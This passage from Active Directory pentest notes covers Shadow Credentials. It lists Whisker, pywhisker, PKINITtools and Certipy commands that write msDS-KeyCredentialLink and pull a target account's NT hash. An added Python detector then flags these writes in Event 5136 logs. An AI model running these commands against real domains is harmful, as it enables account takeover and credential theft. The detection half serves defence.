"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir)

Remember that `WriteDacl` != `GenericWrite`, so in order to modify `msDS-KeyCredentialLink` you must first obtain the necessary privileges on the target object. For example, using StandIn:
Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
Cmd > .\Whisker.exe clear /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx sqltest_cert.pfx -pfx-pass <PFX_PASS> sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key <AES_KEY>
$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]
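Added example (not part of the original notes): detection logic a defender can run over Directory Service Changes records (Security Event ID 5136, which needs the "Audit Directory Service Changes" subcategory enabled and a SACL on the monitored objects) to spot the add-then-clear pattern of `msDS-KeyCredentialLink` writes shown above. The events are constructed and pre-parsed into dicts; the `time` key, the allowlist and the self-write heuristic are assumptions about the environment, not something the event itself carries.

```python
from datetime import datetime, timedelta

# Constructed sample of Event ID 5136 records, pre-parsed into dicts. Field names
# follow the 5136 event schema; OperationType %%14674 = Value Added, %%14675 = Value
# Deleted. "time" is an assumed key populated by the log pipeline.
SAMPLE_5136 = [
    {"time": "2024-05-01T10:00:00", "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,OU=Workstations,DC=megacorp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"time": "2024-05-01T10:05:12", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=sqltest,OU=Servers,DC=megacorp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"time": "2024-05-01T10:07:40", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=sqltest,OU=Servers,DC=megacorp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14675"},
    {"time": "2024-05-01T10:09:00", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=jdoe,OU=Users,DC=megacorp,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

def _cn(dn):
    # First RDN value of the DN, lower-cased ("CN=WS01,..." -> "ws01").
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def _self_write(subject, dn):
    # A principal adding a key to its own object (WS01$ -> CN=WS01) is the
    # normal enrollment case (assumed heuristic; tune for your environment).
    return subject.rstrip("$").lower() == _cn(dn)

def detect_shadow_credential_writes(events, allowlist=(), window=timedelta(minutes=30)):
    """Return alerts for msDS-KeyCredentialLink value additions by a principal that is
    neither the target account itself nor in the allowlist of known enrollment
    principals. Severity becomes "high" when the same subject deletes a value from
    the same object within `window` (the add -> authenticate -> clean-up pattern)."""
    hits = [e for e in events if e["AttributeLDAPDisplayName"].lower() == "msds-keycredentiallink"]
    allowed = {a.lower() for a in allowlist}
    alerts = []
    for e in hits:
        if e["OperationType"] != "%%14674" or e["SubjectUserName"].lower() in allowed:
            continue
        if _self_write(e["SubjectUserName"], e["ObjectDN"]):
            continue
        t0 = datetime.fromisoformat(e["time"])
        cleanup = any(
            x["OperationType"] == "%%14675" and x["ObjectDN"] == e["ObjectDN"]
            and x["SubjectUserName"] == e["SubjectUserName"]
            and timedelta(0) <= datetime.fromisoformat(x["time"]) - t0 <= window
            for x in hits)
        alerts.append({"subject": e["SubjectUserName"], "target": _cn(e["ObjectDN"]),
                       "time": e["time"], "severity": "high" if cleanup else "medium"})
    return alerts
```

Pairing a "high" alert with a subsequent 4768 (TGT request) for the target account that carries certificate information gives the strongest signal; the self-write heuristic will need adjusting where a device-registration service writes keys on behalf of users.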